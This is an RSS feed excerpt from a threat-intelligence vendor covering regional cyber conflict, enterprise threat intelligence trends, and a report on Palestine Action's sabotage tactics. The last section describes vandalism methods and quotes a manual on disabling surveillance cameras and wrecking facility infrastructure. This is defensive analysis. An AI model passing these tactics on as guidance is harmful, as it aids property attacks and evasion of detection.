        <p>While <a href="https://www.cyfirma.com/research/explainer-the-algeria-morocco-tensions/">tensions</a> between Morocco and Algeria have not escalated into armed conflict, cyber hostilities increased significantly in 2025. In the context of these tensions, pro-Algerian hacktivists have allegedly carried out a series of high-profile attacks on Moroccan institutions, <a href="https://therecord.media/morocco-investigates-breach-hackers-algeria">striking</a> the National Social Security Fund, the <a href="https://cybelangel.com/blog/ancfcc-data-leak-flash-report/">National Agency for Land Conservation</a>, and the <a href="https://www.moroccoworldnews.com/2025/06/210448/algerias-jabaroot-targets-justice-ministry-in-latest-cyberattack-on-moroccan-institutions/">Ministry of Justice</a>. The hackers, going by JabaROOT, leaked personal and financial data of millions of Moroccan citizens, potentially exacerbating existing domestic tensions over income disparity. The cyberattacks may have been intended to demonstrate Moroccan vulnerability while maintaining a level of deniability for the Algerian government. Moroccan hacktivists responded with <a href="https://izoologic.com/region/africa/morocco-data-breach-sparks-wave-of-cyber-retaliations/">retaliatory data breaches</a> against the Algerian government and education institutions.</p>
        <h3><em>Espionage Operations Outside of Armed Conflict</em></h3>
        <p>While many more countries almost certainly engage in cyber espionage, the following threat actors have been tracked attempting to collect information on targets of political significance:</p>
        <ul>
          <li>While <strong>India-linked</strong> threat actors such as <a href="https://securelist.com/sidewinder-apt-updates-its-toolset-and-targets-nuclear-sector/115847/">SideWinder</a> and <a href="https://www.proofpoint.com/us/blog/threat-insight/bitter-end-unraveling-eight-years-espionage-antics-part-one">Bitter</a> have traditionally targeted neighbors like Pakistan, Sri Lanka, and Bangladesh, espionage against European diplomatic entities <a href="https://www.enisa.europa.eu/sites/default/files/2025-10/ENISA%20Threat%20Landscape%202025.pdf">increased</a> significantly in 2024, demonstrating a broader targeting scope.</li>
          <li><strong>Vietnam</strong> has <a href="https://www.aspeninstitute.org/publications/the-rise-of-the-rest-maturing-cyber-threats-beyond-the-big-four/">accelerated</a> its development of cyber capabilities. APT32, likely linked to the Vietnamese government, has carried out <a href="https://gbhackers.com/apt32-hacker-group-poisoning-github/">operations</a> against Chinese cybersecurity researchers as well as against internal <a href="https://thehackernews.com/2024/08/vietnamese-human-rights-group-targeted.html">dissidents</a>. In the past, this group has also targeted <a href="https://cyberscoop.com/apt32-ocean-lotus-vietnam-car-companies-hacked/">car manufacturers</a>, <a href="https://www.recordedfuture.com/research/apt32-malware-campaign">foreign governments</a>, and others, driven by geopolitical and economic priorities.</li>
          <li>At least two threat actor groups observed conducting espionage operations have been linked to <strong>Türkiye</strong>: <a href="https://www.microsoft.com/en-us/security/blog/2025/05/12/marbled-dust-leverages-zero-day-in-output-messenger-for-regional-espionage/">Marbled Dust</a> and <a href="https://cyberscoop.com/strongpity-apt-alien-labs-turkey/">StrongPity</a>, who prioritize regional and domestic targets. In addition, a <a href="https://assets.recordedfuture.com/insikt-report-pdfs/2023/cta-2023-0112.pdf">robust online community</a> of patriotic hacktivists targets regional and international adversaries, whether historical (such as Armenia and Greece) or in modern disputes (France and Germany).</li>
          <li>Stealth Falcon, <a href="https://attack.mitre.org/groups/G0038/">linked</a> to the <strong>United Arab Emirates</strong>, has been <a href="https://blog.checkpoint.com/research/inside-stealth-falcons-espionage-campaign-using-a-microsoft-zero-day/">observed</a> exploiting a zero-day vulnerability to target a Turkish defense organization. The group has been active since at least 2016, targeting government and defense organizations primarily in the Middle East and Africa.</li>
        </ul>
        <p>Political and diplomatic priorities make intelligence targets predictable. Organizations should assess not only their regional exposure but also whether their industry aligns with strategic priorities, as sectors tied to national strategy are the most likely targets for espionage.</p>
        <h3><em>Domestic Surveillance Activity</em></h3>
        <p>Many states use their cyber capabilities to monitor domestic security concerns, which can include law enforcement or national security priorities, monitoring political opposition, or conducting economic espionage on behalf of a key national industry. Domestic surveillance capabilities are often supplemented with commercial off-the-shelf spyware, such as Intellexa’s <a href="https://www.recordedfuture.com/research/intellexas-global-corporate-web">Predator</a> or Candiru’s <a href="https://www.recordedfuture.com/research/tracking-candirus-devilstongue-spyware">DevilsTongue</a>. Similar to understanding political priorities for cross-border espionage, companies should assess whether they possess data that may be of political significance to the government of a country in which they operate. States that lack sufficient oversight or legal privacy protections <a href="https://substack.com/inbox/post/180401534?r=3g10gt&amp;utm_medium=ios&amp;triedRedirect=true">pose an increased risk</a> of intrusive cyber monitoring and surveillance.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_1266d09a14347a2b84e82e385594f3abfe78022ec.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="835" />
            </div>
          </div>
          <div>
            <div>
              <p><em><strong>Figure 3:</strong></em> <em>(Left) Graphical representation from the Insikt Group report titled Dark Covenant of the direct and indirect links between Russian Intelligence Services and individuals in the Russian cybercriminal underground; (Right) Infographic of reported cyberattack by Russian state-backed ransomware operators against German military contractors</em></p>
              <p><em>(Source: Recorded Future)</em></p>
            </div>
          </div>
        </div>
        <h2>Outlook</h2>
        <ul>
          <li><strong>Cyberattacks are likely to increase as international alliances weaken</strong>: The Thailand-Cambodia and India-Pakistan conflicts demonstrate an increased willingness to use force to pursue regional goals. Deployments in multilateral peacekeeping operations <a href="https://www.sipri.org/media/press-release/2025/peace-operation-deployments-fall-40-per-cent">decreased by 40%</a> over the last decade, likely due to challenges in generating the necessary support for intervention. This makes it more likely that states will turn to violence to resolve disputes, as opposed to non-violent negotiations. Cyber and influence operations are becoming increasingly common features in these conflicts, serving as a low-cost means of signaling strength, shaping narratives, and imposing limited disruption.</li>
          <li><strong>Cyber capability build-up may follow conventional military build-up:</strong> NATO countries in <a href="https://www.voanews.com/a/billion-rearmament-plan-fuels-european-defense-stocks/8002455.html">Europe</a>, as well as South Korea and <a href="https://apnews.com/article/japan-military-budget-us-australia-china-f82c70bd6f5cbfc184f15cf17f2fde21">Japan</a>, are increasing their military spending. While many of these countries already have advanced cyber capabilities, they may seek to invest in more sophisticated offensive capabilities to augment conventional forces. Legal and doctrinal changes, such as in <a href="https://therecord.media/japan-enacts-new-law-allowing-offensive-cyber-operations">Japan</a> and <a href="https://www.csis.org/blogs/strategic-technologies-blog/south-koreas-2024-cyber-strategy-primer">South Korea</a>, are also laying the groundwork for a shift from a defensive cyber policy to an offensive posture.</li>
          <li><strong>Commercial cyber capabilities may be sought for interstate conflict:</strong> Countries seeking to gain a cyber advantage in advance of a regional conflict may turn to commercial offensive tools, similar to the <a href="https://therecord.media/spyware-purchased-by-eighty-countries-gchq-warns">growing reliance</a> on these tools for internal law enforcement or counterterrorism operations. This reduces the barrier to entry for smaller or less technically mature states, enabling more actors to conduct sophisticated intrusions, targeted espionage, and high-impact disruption.</li>
        </ul>
        <h2>Mitigations</h2>
        <ul>
          <li>Use Recorded Future’s <a href="https://www.recordedfuture.com/products/geopolitical-intelligence">Geopolitical Intelligence</a> to monitor regional conflicts and geopolitical developments for risks to international and outsourced operations.</li>
          <li>Use Recorded Future’s <a href="https://www.recordedfuture.com/products/threat-intelligence">Threat Intelligence</a> to track threat actor groups and detect TTPs associated with non-Big Four countries.</li>
          <li>Understand the risk of surveillance for personnel traveling to high-risk countries and take mitigating actions such as using alternative devices. Use Recorded Future’s Country Risk Data in the <a href="https://www.recordedfuture.com/products/geopolitical-intelligence">Geopolitical Intelligence</a> module to assess surveillance and other travel risks.</li>
          <li>Ensure continuity-of-operations plans are in place to mitigate the impacts of disruptive or destructive attacks. Use Recorded Future <a href="https://www.recordedfuture.com/services/analyst-on-demand">Analyst-on-Demand</a> for bespoke research on how your organization might be targeted.</li>
        </ul>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_1cdc94730e147e8664f08d34340f7be84e08d6510.png?width=750&amp;format=png&amp;optimize=medium" width="1304" height="724" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 4:</strong></em> <em>Starting with these four questions can help you understand threat actors’ motivations for targeting your organization (Source: Recorded Future)</em></div>
          </div>
        </div>
        <h2>Risk Scenario</h2>
        <p><em>A longstanding territorial dispute between Country A and Country B erupts into a military skirmish at the border, with risks of further escalation. Country A is home to a robust business process outsourcing industry serving some of the world’s largest international corporations.</em></p>
        <h3>First-Order Implications</h3>
        <p>Groups claiming to be patriotic hacktivists from both countries conduct hack-and-leak operations and website defacements. These are amplified by partisans on social media who often exaggerate the impact of these attacks.</p>
        <ul>
          <li><strong>Competitive disadvantage:</strong> Hack-and-leak operations expose sensitive internal documents, including proprietary trade secrets and embarrassing communications.</li>
          <li><strong>Increased surveillance risk:</strong> The conflict increases domestic surveillance activity in Country B to monitor for internal threats. International employees traveling to Country B are subject to enhanced surveillance.</li>
        </ul>
        <h3>Second-Order Implications</h3>
        <p>Actors claiming to be hacktivists supporting Country A escalate cyber operations, carrying out persistent cyberattacks against Country B’s electrical grid. As a result, Country B experiences rolling blackouts in the capital city.</p>
        <ul>
          <li><strong>Operational disruption:</strong> The blackouts prevent call centers from performing essential business functions, resulting in significant service delays and revenue losses for corporations worldwide.</li>
          <li><strong>Physical security risk:</strong> Anger over blackouts increases public support for escalating operations against Country A. The escalation of conflict increases the risk of harm to employees or the destruction of facilities.</li>
        </ul>
        <h3>Third-Order Implications</h3>
        <p>The United States and China become increasingly involved in the conflict between Country A and Country B, providing military, logistical, and cyber capabilities to their preferred country. The external support prolongs the conflict and increases the risk of involving neighboring countries.</p>
        <ul>
          <li><strong>Conflict escalation:</strong> With more weapons and logistical support from great power backers, fighting between Country A and Country B expands from the border to strikes further in the interior. Both military and civilian casualties increase as violence escalates.</li>
          <li><strong>Regional economic impact:</strong> Extended disruptions may cause international corporations to move operations to more stable regions, leading to a negative economic impact in the region.</li>
        </ul>
        <h2>Further Reading</h2>
        <ul>
          <li><a href="https://www.recordedfuture.com/research/influence-operations-and-conflict-escalation-in-south-asia">Influence Operations and Conflict Escalation in South Asia</a></li>
          <li><a href="https://www.recordedfuture.com/research/apt32-malware-campaign">New APT32 Malware Campaign Targets Cambodian Government</a></li>
          <li><a href="https://substack.com/inbox/post/180401534?r=3g10gt&amp;utm_medium=ios&amp;triedRedirect=true">From Pegasus to Pall Mall: Managing Risks of Offensive Cyber Capabilities</a></li>
          <li><a href="https://assets.recordedfuture.com/insikt-report-pdfs/2023/cta-2023-0112.pdf">Current Trends in the Turkish Language Dark Web</a></li>
        </ul>
      ]]></content:encoded>
            <category>Research (Insikt)</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/research/media_1a43602f57ec7a07f0637d7b7010998c1f0bcbc8d.gif?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[What’s Next for Enterprise Threat Intelligence in 2026]]></title>
            <link>https://www.recordedfuture.com/blog/whats-next-for-enterprise-threat-intelligence-in-2026</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/blog/whats-next-for-enterprise-threat-intelligence-in-2026</guid>
            <pubDate>Mon, 15 Dec 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[Top enterprise threat intelligence trends for 2026: AI-augmented CTI, unified platforms, workflow integration, data fusion, budgets, ROI, and maturity.]]></description>
            <content:encoded><![CDATA[
        <h2>Introduction</h2>
        <p>The cybersecurity landscape is rapidly growing in scale and complexity. Enterprises face a rising tide of sophisticated threats that cannot be contained by traditional, reactive defenses alone. With AI and automation lowering the barrier to entry for attackers exploiting new avenues, there is more opportunity than ever for disruptive, high-volume attacks.</p>
        <p>The need for organizations to mature their threat intelligence capabilities is clear, but the road to get there isn’t always easy. Recorded Future’s <a href="https://pages.recordedfutureext.com/2025-State-of-Threat-Intelligence-Report.html">2025 State of Threat Intelligence Report</a> found that only 49% of enterprises currently consider their threat intelligence maturity as advanced, yet 87% expect to make significant progress in the next two years.</p>
        <p>This gap between today’s capabilities and tomorrow’s ambitions reflects a familiar challenge: organizations have plenty of threat data, but struggle to connect, automate, and operationalize it effectively across teams and tools.</p>
        <p>Based on insights from the report, here is what enterprises can expect when it comes to threat intelligence in 2026.</p>
        <h2>Key Trends Driving Threat Intelligence Evolution</h2>
        <p>There are several key trends set to shape threat intelligence in the coming year, and organizations wanting to prioritize maturity should be on the lookout for partners that embrace and evolve with these currents in mind.</p>
        <ul>
          <li><strong>Vendor Consolidation for Unified Intelligence:</strong> Enterprises are looking to reduce tool fragmentation by consolidating threat intelligence vendors and feeds into a single platform. A unified approach promises a “single source of truth,” making it easier to operationalize intelligence across the organization.</li>
          <li><strong>Deeper Integration into Security Workflows:</strong> Organizations want threat intelligence deeply embedded in their existing security stack rather than as a siloed feed. In fact, 25% of enterprises plan to integrate threat intelligence with additional workflows (e.g. IAM, fraud, GRC) in the next two years to broaden their reach.</li>
          <li><strong>Automation and AI Augmentation:</strong> To cope with accelerating threats and volumes of data, teams are embracing automation in threat intelligence. The future lies in machine-speed analysis that automatically correlates and enriches intelligence so analysts can focus on high-level judgment.</li>
          <li><strong>Fusion of Internal and External Data:</strong> Over a third of organizations (36%) plan to combine external threat intelligence with data from their own environment to gain better insight into risk posture (and even benchmark against peers).</li>
        </ul>
        <h2>Challenges Holding Team Backs Today</h2>
        <p>Despite this forward momentum, many enterprise teams still struggle with persistent challenges that hinder their threat intelligence efforts.</p>
        <ul>
          <li><strong>Integration Gaps:</strong> Fragmented ecosystems remain a top concern. Nearly half of organizations (48%) cite poor integration with existing security tools among their biggest pain points.</li>
          <li><strong>Credibility and Trust Issues:</strong> Data means little if analysts don’t trust the intelligence. Half of enterprises say verifying the credibility and accuracy of threat intelligence is a major challenge.</li>
          <li><strong>Signal-to-Noise Overload:</strong> With huge volumes of alerts and feeds, 46% of enterprises struggle to filter relevant insight from noise. This information overload hampers visibility into real threats, drains team efficiency, and contributes to analyst burnout.</li>
          <li><strong>Lack of Context for Action:</strong> Even when threat data is available, 46% of organizations lack the context needed to translate it into meaningful risk insights or actionable priorities.</li>
        </ul>
        <p>These barriers help explain why many programs plateau at an intermediate maturity. Teams may ingest more data sources over time, but still fall short on the automation, integration, and context needed for truly advanced, predictive intelligence.</p>
        <h2>Envisioning Threat Intelligence in 2026: Proactive, Integrated, and Business-Aligned</h2>
        <p>In the near future, leading enterprises will treat threat intelligence not as a side task but as a strategic function integrated into business processes. This means embedding threat insights directly into risk assessments, vulnerability management, and even board-level decisions on security (notably, 58% of organizations already use threat intelligence to guide business risk assessment decisions today).</p>
        <p>Instead of simply reacting to incidents after they occur, advanced threat intelligence programs will analyze patterns and emerging trends to warn of potential attacks before they fully materialize. This doesn’t mean magically “knowing the future,” but sharpening awareness by connecting subtle signals across many sources and mapping them to one’s environment.</p>
        <p>Human analysts will still be central for this kind of work, though their capabilities will be augmented by AI such that detection and response happen at machine speed. Intelligence platforms will automatically enrich new indicators, correlate them with ongoing events, and even trigger protective actions in real time—all with analysts overseeing the entire process.</p>
        <p>Ultimately, a mature program in 2026 will be measured by the outcomes it enables and the risk it reduces for the organization. This means protecting the assets, uptime, and reputation the business cares about, and improving decision quality at all levels of management.</p>
        <h2>Implications for 2026 Security Budgets and Investments</h2>
        <p>As threat intelligence becomes more central to security strategy, it’s also becoming a bigger line item in budgets. In fact, 91% of organizations plan to increase their threat intelligence spending in 2026, reflecting its critical role in an era of escalating cyber threats.</p>
        <p>One likely area for these increased funds is platform consolidation. Many teams are reevaluating their myriad point solutions and considering a move to more integrated platforms that unify multiple sources and use cases, reducing complexity and cost over time.</p>
        <p>Another likely investment will be in automation and AI capabilities. With cyber talent scarce and alert volumes ever-increasing, it will be vital to budget for tools that automate threat intelligence workflows end-to-end. From data collection and enrichment to triage and even initial response, automation will be key to doing more with the same team.</p>
        <div>
          <div>
            <div>After integrating Recorded Future into our Cyber Threat Intelligence (CTI) workflow…. We reduced detection time by 40%, from an average of 48 hours to 28 hours. Incident response efficiency improved by 30%, as automated enrichment from Recorded Future replaced manual intelligence gathering. We also identified and mitigated 25% more threats compared to the previous quarter.</div>
          </div>
          <div>
            <div><strong>Cyber Threat Intelligence Specialist, Large Enterprise Professional Services Company</strong></div>
          </div>
        </div>
        <p>Organizations should also ensure that new investments deliver contextual intelligence tailored to their business. It’s not enough to simply buy more feeds or tools that spit out data; the value lies in solutions that fuse internal data with external threat feeds and apply analytics to highlight what matters most.</p>
        <p>That said, not every organization will have the same needs and challenges. The key to fully maximizing ROI will be aligning spending with the organization’s biggest gaps and pain points. If credibility of data is a major challenge, invest in sources with proven reliability or validation features. If integration is a key issue, focus spending on consolidation projects or appropriate vendor services.</p>
        <p>Security teams should also establish clear metrics (such as reduced incident response time or incidents prevented) to measure the impact of threat intelligence investments. For example, over half (54%) of organizations now measure success by improved detection and response times, making it a top metric for demonstrating value delivered by threat intelligence initiatives.</p>
        <h2>Charting the Course to 2026</h2>
        <p>Enterprise threat intelligence is undoubtedly maturing and becoming more ingrained in security programs, yet much work still remains. Nearly half of organizations may call themselves “advanced” today, but truly predictive, integrated intelligence at scale is still a goalpost ahead. In looking toward 2026, security leaders should double down on the fundamentals that drive intelligence maturity: integration, automation, and alignment with business priorities.</p>
        <p>By breaking down silos between tools and teams, trusting and acting on intelligence through improved data credibility and context, and continually measuring what works, teams can evolve from reactive defense to an anticipatory, intelligence-driven security posture.</p>
        <p>So what are some practical next steps? First, it’s wise to benchmark your organization’s current program to identify gaps and opportunities. Tools like <a href="https://www.recordedfuture.com/resources/maturity-assessment">Recorded Future’s Threat Intelligence Maturity Assessment</a> provide a structured way to evaluate where you stand today and get tailored recommendations on how to improve.</p>
        <p>With that insight, you can develop a roadmap that includes the right people, process, and technology investments to operationalize threat intelligence in the most efficient way. Keep the big picture in mind: the ultimate aim is to see more threats, identify them faster, and take action to reduce risk before damage is done. With a thoughtful strategy and an eye towards these trends, organizations can chart a course from today’s challenges to a more proactive and resilient threat intelligence function in 2026 and beyond.</p>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/blog/media_18741ecd2e5bc1f72686d64726aaa4419be1e620f.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Palestine Action: Operations and Global Network]]></title>
            <link>https://www.recordedfuture.com/research/palestine-action-operations-and-global-network</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/research/palestine-action-operations-and-global-network</guid>
            <pubDate>Thu, 11 Dec 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[Explores Palestine Action’s post-designation global network, tactics, and targets, and evaluates key physical risks and mitigations for organizations.]]></description>
            <content:encoded><![CDATA[
        <h2>Executive Summary</h2>
        <p>Palestine Action has almost certainly responded to its July 2025 designation as a terrorist organization in the United Kingdom (UK) by encouraging domestic violent extremists (DVEs) outside the UK with a nexus to the group to increase the scope and frequency of their operations, while abstaining from conducting or claiming attacks within the UK. Palestine Action’s dual-track strategy, very likely intended to maintain pressure on the multinational companies they target while avoiding complications to their legal efforts to contest the UK designation in court, almost certainly poses persistent physical threats to private and public sector facilities in Western Europe, North America, and Australia. Recent arrests of pro-Palestine Action protesters in the UK and events in the Israel-Hamas conflict have very likely prompted Palestine Action’s global network to more frequently conduct militant direct actions on behalf of Palestine Action’s interests.</p>
        <p>Palestine Action’s global network consists of pro-Palestinian activist groups that share the UK branch’s commitment to militant direct action and other core aspects of the group’s operational profile — such as motivating ideologies, preferred targets, area(s) of operation, or tactics, techniques, and procedures (TTPs). The most popular TTPs within the network are almost certainly those that Palestine Action’s UK branch has promoted or employed, including vandalizing the exterior of facilities with red paint or blunt instruments, obstructing facilities with “human chains” or large objects, and sabotaging valuable assets inside the perimeter of a facility. Defense contractors that provide services to Israel’s government or military are almost certainly the primary target of the Palestine Action global network, although the network has also frequently targeted insurance agencies, banks and financial entities, and shipping companies.</p>
        <h2>Key Findings</h2>
        <ul>
          <li>Palestine Action’s July 2025 terrorism designation in the UK very likely broadened the geographic scope of its operations and potential targets, as activist groups in its global network outside the UK almost certainly have greater freedom of maneuver.</li>
          <li>Since October 7, 2023, events in the Israel-Hamas conflict, especially expansions of Israeli military activity or reports of humanitarian crises in the Gaza Strip, have prefigured physical attacks with a nexus to Palestine Action.</li>
          <li>The facilities of Western European, North American, and Australian defense contractors, banks, insurance companies, international shipping and logistics service providers, and government agencies — particularly those with a perceived relationship to Israel — very likely face elevated physical risks from Palestine Action’s global network.</li>
          <li>The most costly Palestine Action operations — some of which have caused several million dollars in damages to targeted organizations — very likely resulted from Palestine Action operatives breaching facilities’ secure perimeters.</li>
          <li>In the short to medium term, Palestine Action militant direct action in the UK is very likely to maintain a lower operational tempo until the group either succeeds in its effort to rescind its terrorism designation or exhausts all legal avenues to do so.</li>
        </ul>
        <h2>Palestine Action: History and Terrorism Designation</h2>
        <p>Palestine Action was <a href="https://web.archive.org/web/20210530081122/https://palestineaction.org/the-launch-of-palestine-action/">founded</a> in the UK in July 2020 by Huda Ammori and Richard Loxton-Barnard, longtime UK-based activists in the pro-Palestinian and environmental movements, respectively. The almost certain core purpose of Palestine Action is to <a href="https://newleftreview.org/sidecar/posts/tactics-of-disruption">promote</a> militant direct action by pro-Palestinian activists around the world, particularly those who aim to disrupt the operations of government agencies, defense contractors, and private companies that supply Israel or the Israel Defense Forces (IDF). Historically, the group’s UK core has <a href="https://newleftreview.org/sidecar/posts/tactics-of-disruption">focused</a> its efforts on targeting the Israeli multinational defense contractor Elbit Systems (Elbit), as well as its partners and subsidiaries. Like other domestic violent extremist (DVE) groups, Palestine Action and its individual global network groups very likely lack formal hierarchies, opting instead to function in the form of decentralized activist cells.</p>
        <p>Palestine Action very likely distinguishes between elements of the organization that focus on non-violent direct actions — such as protests, demonstrations, and political activity — and the organization’s covert cells dedicated to militant direct action. On August 2, 2023, the group announced the creation of “Palestine Action Underground,” its label for the group’s “covert missions,” and stated that its future militant direct actions would target “any business found to be collaborating with Elbit via their research, technology, consultation, labour, components, or any other service.” A March 2025 unclassified intelligence assessment from the UK’s Joint Terrorism Assessment Center (JTAC) <a href="https://static01.nyt.com/newsgraphics/documenttools/c8fe6a933eb1bb7b/70535e60-full.pdf">reported</a> that between July 2020 and March 2025, Palestine Action “conducted over 385 direct actions” in the UK, including both non-violent and militant direct actions. These actions have occurred throughout the UK, supporting JTAC’s assessment that the group has cells throughout the country, but police in the UK have reported higher degrees of Palestine Action-related activity in Greater London, as well as “Staffordshire, Greater Manchester, Leicestershire, Metropolitan, Kent, and Avon and Somerset.”</p>
        <p>The frequency and scope of Palestine Action’s operations in the UK almost certainly <a href="https://newleftreview.org/sidecar/posts/tactics-of-disruption">increased</a> following the October 7, 2023, Hamas attack in Israel and the subsequent Israel-Hamas war in the Gaza Strip. <strong>Figure 1</strong> (below) shows references in the Recorded Future Intelligence Operations Platform to incidents of sabotage or vandalism in the UK involving Palestine Action between its 2020 founding and 2025 terrorism designation, annotated with significant events during the post-October 2023 Israel-Hamas conflict. In many instances, Palestine Action’s operations followed major developments in this conflict, such as expansions of Israeli military activity in the Gaza Strip or elsewhere in the Middle East, reports of humanitarian crises in Gaza, or the deaths of senior Hamas, Palestinian Islamic Jihad (PIJ), or Hezbollah figures in targeted airstrikes.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_149bfd2b732d8d0ef9b2dd07170bc16c93226b7c6.png?width=750&amp;format=png&amp;optimize=medium" width="1428" height="738" />
        </p>
        <p><em><strong>Figure 1</strong>: References to Palestine Action operations in the UK in the Recorded Future Intelligence Operations Platform alongside key developments in the Israel-Hamas conflict (Source: Recorded Future)</em></p>
        <p>The culmination of Palestine Action’s direct action campaign in the UK was a June 20, 2025, <a href="https://www.bbc.com/news/articles/cx24nppdx0lo">operation</a> in which several of the group’s members illegally breached the Royal Air Force (RAF) Brize Norton base in Oxfordshire, sprayed paint into the engines of two RAF Airbus A330 Multi Role Tanker Transport (MRTT) aerial refueling aircraft, and damaged the jets with crowbars. In total, the attack <a href="https://apnews.com/article/raf-brize-norton-palestine-action-planes-8467a20bcd088e24c3fe061852b33ba2">caused</a> over seven million pounds ($9.5 million) in damages and prompted calls for UK law enforcement agencies to crack down on Palestine Action. Three days after the attack, UK Home Secretary Yvette Cooper <a href="https://hansard.parliament.uk/commons/2025-06-23/debates/25062337000014/PalestineActionProscription">announced</a> the Home Office’s intent to proscribe Palestine Action under the UK’s Terrorism Act 2000. The UK Parliament approved the proscription with votes on July 2 and 3, 2025, and Palestine Action was officially <a href="https://www.legislation.gov.uk/uksi/2025/803/pdfs/uksiem_20250803_en_001.pdf">designated</a> a terrorist organization in the UK on July 5; this status prohibits individuals from joining, fundraising, or expressing support for Palestine Action, with legal penalties as severe as fourteen years in prison for being convicted of being a Palestine Action member.</p>
        <p>Palestine Action has almost certainly pursued a dual-track strategy in response to its designation in the UK, abstaining from major sabotage operations in the UK while inciting its global network to conduct these operations outside of the country. Insikt Group is not aware of significant incidents of sabotage connected to Palestine Action in the UK since its proscription. Instead, the group has attempted to legally <a href="https://www.bbc.com/news/articles/ce9dg5v43vmo">challenge</a> the ban and garner public support for its cause through a <a href="https://www.bbc.com/news/articles/ceq2e9x19g8o">series</a> of unlawful (due to Palestine Action’s proscription) but well-attended protests in which several thousand demonstrators have been arrested for expressing support for Palestine Action.</p>
        <p>However, the organization’s international network outside the UK has almost certainly taken responsibility for Palestine Action’s direct action campaigns, targeting defense contractors, militaries, and other industries perceived to be supporting Israel with sabotage, vandalism, and other disruptive physical threat activities despite the UK terrorism designation. In August 2025, Palestine Action’s official website deleted all of its content and posted a statement (<strong>Figure 2</strong>) claiming that “the website has been transferred to others in the global movement who are not active in Britain or British nationals.” The website now provides two ways for individuals to contribute to the organization: through its Monero (XRP) cryptocurrency wallet or through the website of its Italian franchise, Palestine Action Italia (also known as Palestina Libera). On September 8, 2025, a Palestine Action Global social media account began posting and announced the launch of the “Palestine Action Global” platform, indicating the organization’s belief that “Palestine Action is a global network taking direct action against the Israeli war machine.”</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_12151bbf3b847608b6c89f0a881a17286c50082ea.png?width=750&amp;format=png&amp;optimize=medium" width="1409" height="663" /><br /><em><strong>Figure 2:</strong></em> <em>Statement on Palestine Action website with cryptocurrency wallet information and link to Italian franchise (Source: Palestine Action)</em>
        </p>
        <p>Groups in Palestine Action’s network in North America, Europe, and Australia — as detailed below — are very likely to increase their operational tempo in response to the UK proscription of Palestine Action and ongoing developments in the Israel-Hamas conflict. In the short term, the frequency of direct action conducted by groups in Palestine Action’s global network is likely to outpace the parent organization in the UK, as it is likely to continue its <em>de facto</em> moratorium on sabotage and vandalism while it attempts to legally appeal its proscription. Nevertheless, Palestine Action will very likely attempt to continue providing support to its international network through organizing trainings for activists, sharing instructional material, and using its platform to advertise the activities of the network around the world.</p>
        <h2>Palestine Action’s Tactics, Techniques, Procedures, and Targets</h2>
        <p>Palestine Action’s UK branch and its global network almost certainly rely on standard operating procedures for conducting attacks against facilities to disrupt the business operations of their intended targets. Specifically, DVEs associated with the group almost certainly prefer TTPs for attacks that are described in Palestine Action’s 2023 instructional guide to carrying out militant direct actions in support of the group’s objectives. Namely, Palestine Action and its global network have frequently and repeatedly used the same vandalism, physical obstruction, and sabotage TTPs in operations, as described in the following section. DVEs with a nexus to Palestine Action very likely select which TTP to employ in operations based on their level of access to the targeted facility in question, conducting more destructive and sophisticated attacks when they are able to gain interior access.</p>
        <p>Across the globe, Palestine Action and similar groups’ almost certainly primary targets are the offices of defense contractors that have perceived relationships with the IDF or the Israeli government. In the UK and Western Europe, Elbit and its subsidiaries and partners have been most frequently targeted in Palestine Action attacks. However, due to the global footprint of Palestine Action’s network and the expansion of the Israel-Hamas conflict since October 2023, Palestine Action and similar groups have also attacked entities in other sectors that are perceived to be doing business with the IDF, the Israeli government, or Elbit. Aside from defense contractors and governments, the most frequently targeted industry sectors are insurance, banks and financing, logistics, and shipping.</p>
        <h3>Direct Action TTPs</h3>
        <p>Palestine Action almost certainly uses physical attack TTPs that are intended to maximize the degree of economic disruption and damage to targeted facilities, but minimize the risks of harm to individuals and detection by law enforcement. By imposing financial cost on targeted companies during operations, Palestine Action almost certainly seeks to convince the targeted entity to sever its relationships with the IDF or Israeli government. Insikt Group associates the following overarching TTPs with attacks perpetrated by Palestine Action or its global network:</p>
        <ul>
          <li>Palestine Action operations are typically carried out by small cells, mostly consisting of fewer than five activists.</li>
          <li>Palestine Action conducts targeted operations against facilities outside of business hours to maintain operational security and minimize the risks of harm to personnel or the identification/detection of its operatives.</li>
          <li>Palestine Action operations aim to impose substantial financial costs to targeted entities through rudimentary, low-sophistication methods.</li>
          <li>Palestine Action operatives prefer vandalism, obstruction, and sabotage as TTPs; which TTP is selected is very likely contingent on the degree of access to the facility.
            <ul>
              <li>If operatives cannot gain entry to the facility, they will very likely prefer to vandalize the exterior of the facility or attempt to block external entry.</li>
              <li>If operatives are able to gain internal access to the facility — usually by identifying and exploiting potential access points during pre-attack reconnaissance or by using physical force to enter — they will very likely attempt to sabotage infrastructure inside the facility.</li>
            </ul>
          </li>
        </ul>
        <h4>Vandalism</h4>
        <p>Almost all observed Palestine Action operations involve vandalism of the exterior of targeted facilities, with two types of actions especially prominent. First, DVEs affiliated with Palestine Action have frequently used red spray paint to either indiscriminately color or write messages on the facades of targeted facilities, or, by dispersing paint through a fire extinguisher, blanketing the exterior or interior of a facility with red paint. Second, these DVEs use tools or projectiles, including hammers, crowbars, blunt objects, and bricks, to destroy windows on the exterior of targeted buildings.</p>
        <p>These vandalism methods are each attested to in Palestine Action’s official instructional guide as effective ways to “destrupt [sic], damage or destroy your target.” The manual also recommends that DVEs use the same vandalism TTPs to damage exterior surveillance systems in order to avoid detection during direct actions, or to destroy infrastructure such as air conditioning systems or pipes outside the facility to “sabotage the profits of your target even further.”</p>
        <p>
